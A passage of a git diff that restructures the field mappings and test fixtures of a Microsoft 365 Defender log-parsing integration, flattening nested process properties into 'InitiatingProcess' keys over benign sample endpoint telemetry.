@@ -531,15 +530,6 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json index 17cad5081..ca708b0ed 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json 
@@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json index 413d002c1..2655cb069 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -23,18 +23,16 @@ "action": { "properties": { "AccountSid": "S-1-2-3", - "process": { - "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", - "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "FileSize": 3316224, - "LogonId": "5223047", - "VersionInfoCompanyName": "Test Corporation", - "VersionInfoFileDescription": "Browser EXE", - "VersionInfoInternalFileName": "Browser.EXE", - "VersionInfoOriginalFileName": "Browser.EXE", - "VersionInfoProductName": "Test Product", - "VersionInfoProductVersion": "1, 0, 0, 1" - } + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" }, "type": "SensitiveFileRead" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 4964dae1f..1f1351d52 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json 
@@ -16,9 +16,7 @@ "@timestamp": "2024-10-22T15:09:08.851712Z", "action": { "properties": { - "process": { - "LogonId": "0" - } + "InitiatingProcessLogonId": "0" }, "type": "ScriptContent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json index c34cefa50..3292ed6fe 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:19:26.502777Z", "action": { "properties": { - "process": { - "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", - "CommandLine": "\"OUTLOOK.EXE\" ", - "FileSize": 44152968, - "LogonId": "389220681", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Outlook", - "VersionInfoInternalFileName": "Outlook", - "VersionInfoOriginalFileName": "Outlook.exe", - "VersionInfoProductName": "Microsoft Outlook", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" }, "type": "GetClipboardData" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json index ea0ddb0df..fea26327a 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:15:59.550882Z", "action": { "properties": { - "process": { - "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", - "CommandLine": "powershell.exe", - "FileSize": 450560, - "LogonId": "398124703", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows PowerShell", - "VersionInfoInternalFileName": "POWERSHELL", - "VersionInfoOriginalFileName": "PowerShell.EXE", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.22621.3085" - } + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" }, "type": "PowerShellCommand" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json index 48696c644..672754009 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json 
@@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:17:23.330722Z", "action": { "properties": { - "process": { - "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", - "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "FileSize": 1621656, - "LogonId": "8066492", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Word", - "VersionInfoInternalFileName": "WinWord", - "VersionInfoOriginalFileName": "WinWord.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" }, "type": "ShellLinkCreateFileEvent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json index 94b70858f..7428190cf 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json 
@@ -16,19 +16,17 @@ "@timestamp": "2022-09-01T07:46:42.468408Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "FileSize": 56824728, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", - "VersionInfoInternalFileName": "OneDriveSetup.exe", - "VersionInfoOriginalFileName": "OneDriveSetup.exe", - "VersionInfoProductName": "Microsoft OneDrive", - "VersionInfoProductVersion": "22.166.0807.0002" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "InitiatingProcessFileSize": 56824728, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", + "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", + "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" }, "type": "FileDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json index 1a9daafcd..73d8718f8 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json @@ -22,19 +22,17 @@ "@timestamp": "2024-11-08T14:38:51.904876Z", "action": { "properties": { - "RequestAccountSid": "S-1-2-3", - "process": { - "CommandLine": "commandexec.exe /V", - "FileSize": 176128, - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows\u00ae installer", - "VersionInfoInternalFileName": "commandexec", - "VersionInfoOriginalFileName": "commandexec.exe", - "VersionInfoProductName": "Windows Installer - Unicode", - "VersionInfoProductVersion": "5.0.22621.3880" - } + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" }, "type": "FileCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json index 04559806a..497faa7bf 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json 
@@ -16,12 +16,10 @@ "@timestamp": "2022-09-01T07:47:58.616127Z", "action": { "properties": { - "process": { - "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", - "FileSize": 66560, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault" - } + "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", + "InitiatingProcessFileSize": 66560, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault" }, "type": "ImageLoaded" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json index e70edf395..15dc7a41b 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json @@ -17,11 +17,9 @@ "action": { "properties": { "AccountSid": "S-1-1-11-1-1", + "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession", "LogonId": "111111", - "LogonType": "Interactive", - "process": { - "CommandLine": "WinLogon.exe -SpecialSession" - } + "LogonType": "Interactive" }, "type": "LogonSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json index 75ab306b8..348f76f4e 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json 
@@ -16,21 +16,19 @@ "@timestamp": "2023-01-04T14:05:32.314862Z", "action": { "properties": { + "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", + "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", + "InitiatingProcessFileSize": 63984520, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel", + "InitiatingProcessVersionInfoInternalFileName": "Excel", + "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538", "LocalIPType": "Private", - "RemoteIPType": "Public", - "process": { - "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", - "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", - "FileSize": 63984520, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Excel", - "VersionInfoInternalFileName": "Excel", - "VersionInfoOriginalFileName": "Excel.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.15601.20538" - } + "RemoteIPType": "Public" }, "type": "ConnectionSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 3847a138b..5a90081c8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json 
@@ -17,30 +17,26 @@ "action": { "properties": { "AccountSid": "S-1-1-11", + "InitiatingProcessCommandLine": "\"MsMpEng.exe\"", + "InitiatingProcessFileSize": 133576, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessLogonId": "999", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable", + "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe", + "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", - "process": { - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", - "VersionInfoInternalFileName": "MpCmdRun", - "VersionInfoOriginalFileName": "MpCmdRun.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "4.18.2301.6", - "parent": { - "CommandLine": "\"MsMpEng.exe\"", - "FileSize": 133576, - "IntegrityLevel": "System", - "LogonId": "999", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Antimalware Service Executable", - "VersionInfoInternalFileName": "MsMpEng.exe", - "VersionInfoOriginalFileName": "MsMpEng.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "4.18.2301.6" - } - } + "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", + "ProcessVersionInfoCompanyName": "Microsoft Corporation", + "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", + 
"ProcessVersionInfoInternalFileName": "MpCmdRun", + "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe", + "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "ProcessVersionInfoProductVersion": "4.18.2301.6" }, "type": "ProcessCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index cac1e9791..cab75fb0a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json 
@@ -23,30 +23,26 @@ "action": { "properties": { "AccountSid": "S-1-2-3", + "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "InitiatingProcessFileSize": 145408, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessLogonId": "999", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "file", + "InitiatingProcessVersionInfoOriginalFileName": "file.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", "LogonId": "999", - "process": { - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Network Command Shell", - "VersionInfoInternalFileName": "processcommand.exe", - "VersionInfoOriginalFileName": "processcommand.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.22621.1", - "parent": { - "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "FileSize": 145408, - "IntegrityLevel": "System", - "LogonId": "999", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows\u00ae installer", - "VersionInfoInternalFileName": "file", - "VersionInfoOriginalFileName": "file.exe", - "VersionInfoProductName": "Windows Installer - Unicode", - "VersionInfoProductVersion": "5.0.22621.3880" - } - } + "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", + "ProcessVersionInfoCompanyName": "Microsoft Corporation", + "ProcessVersionInfoFileDescription": "Network Command Shell", + 
"ProcessVersionInfoInternalFileName": "processcommand.exe", + "ProcessVersionInfoOriginalFileName": "processcommand.exe", + "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "ProcessVersionInfoProductVersion": "10.0.22621.1" }, "type": "ProcessCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json index 212f23549..3fe0d2cf8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json 
@@ -16,19 +16,17 @@ "@timestamp": "2023-01-04T14:35:20.616193Z", "action": { "properties": { - "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements", - "process": { - "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", - "FileSize": 445440, - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Host Process for OMA-DM Client", - "VersionInfoInternalFileName": "omadmclient", - "VersionInfoOriginalFileName": "omadmclient.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.19041.2193" - } + "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", + "InitiatingProcessFileSize": 445440, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client", + "InitiatingProcessVersionInfoInternalFileName": "omadmclient", + "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193", + "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements" }, "type": "RegistryKeyDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index c632ebbfa..a04e0e8be 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -16,9 +16,7 @@ "@timestamp": "2024-10-22T15:09:47.246794Z", "action": { "properties": { - "process": { - "LogonId": "0" - } + "InitiatingProcessLogonId": "0" }, "type": "ScriptContent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json index 5f3e9f9b1..294c92d60 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json 
@@ -17,18 +17,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 57b4e7abc..031a0b50a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json index e45140956..7d110bb54 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": 